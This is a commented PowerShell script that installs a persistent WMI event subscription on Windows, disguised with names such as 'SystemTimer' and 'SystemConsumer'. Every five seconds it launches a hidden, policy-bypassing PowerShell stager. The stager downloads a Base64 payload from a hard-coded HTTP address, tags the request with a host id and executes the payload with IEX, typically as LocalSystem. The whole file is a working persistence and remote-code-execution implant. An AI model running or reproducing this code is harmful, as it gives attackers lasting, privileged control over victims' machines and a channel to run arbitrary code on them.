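# Installs a permanent WMI event subscription in root\subscription: an interval
# timer fires every few seconds, the bound CommandLineEventConsumer launches a
# hidden PowerShell stager, and that stager downloads a Base64 stage from a
# hard-coded HTTP URL and IEX's it. Writing to root\subscription normally needs
# administrative rights, and the consumer's command runs out of the WMI provider
# host (typically LocalSystem), not as the user who ran this script.
#
# Settings. Defaults are the original hard-coded values; change them in one place.
$callbackUrl  = 'http://192.168.100.1/index.html'   # plaintext HTTP; the stage is neither authenticated nor integrity-checked
$timerId      = 'SystemTimer'
$filterName   = 'SystemFilter'
$consumerName = 'SystemConsumer'
$intervalMs   = '5000'                              # IntervalBetweenEvents is in milliseconds (5 s)

# Clean up a previous run. Only the objects this script creates are removed:
# deleting every __EventFilter / __FilterToConsumerBinding in the namespace would
# also destroy unrelated subscriptions (Windows itself registers some, e.g. the
# SCM Event Log Filter/Consumer pair). The binding goes first so no dangling
# reference is left behind.
gwmi -Namespace root\subscription -Class __FilterToConsumerBinding |
    Where-Object { $_.Filter -like "*$filterName*" } | rwmi
gwmi -Namespace root\subscription -Class __EventFilter -Filter "Name='$filterName'" | rwmi
gwmi -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='$consumerName'" | rwmi
gwmi -Namespace root\subscription -Class __TimerInstruction -Filter "TimerId='$timerId'" | rwmi

# Per-host identifier sent back in an HTTP header so the server can tell
# callbacks apart. It is just a random integer, so collisions are possible.
$id = [string](Get-Random)

# The stager the consumer will run: fetch the Base64 stage, decode, IEX.
# The stage is decoded as ASCII, so any byte above 0x7F in it becomes '?'.
$cmd = "`$i=(New-Object Net.WebClient);`$i.Headers.add('hostid','$id');IEX([Text.Encoding]::Ascii.GetString([Convert]::FromBase64String((`$i.DownloadString('$callbackUrl')))))"
write-host $cmd

# -EncodedCommand expects Base64 of UTF-16LE text, hence Unicode rather than ASCII/UTF8.
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$cmd = [Convert]::ToBase64String($bytes)

# Timer -> filter -> consumer -> binding. The timer raises a __TimerEvent every
# $intervalMs; the filter selects only events from our timer; the consumer holds
# the command line to run; the binding ties filter and consumer together and is
# the step that makes the subscription live.
Set-WmiInstance -Namespace root\subscription -Class __IntervalTimerInstruction -Arguments @{TimerId=$timerId; IntervalBetweenEvents=$intervalMs}
$f = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name=$filterName; QueryLanguage="WQL"; Query="select * from __TimerEvent within 30 where timerid='$timerId'"}
$c = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name=$consumerName; CommandLineTemplate="powershell -w hidden -ep bypass -nop -EncodedCommand $cmd"}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$f;Consumer=$c}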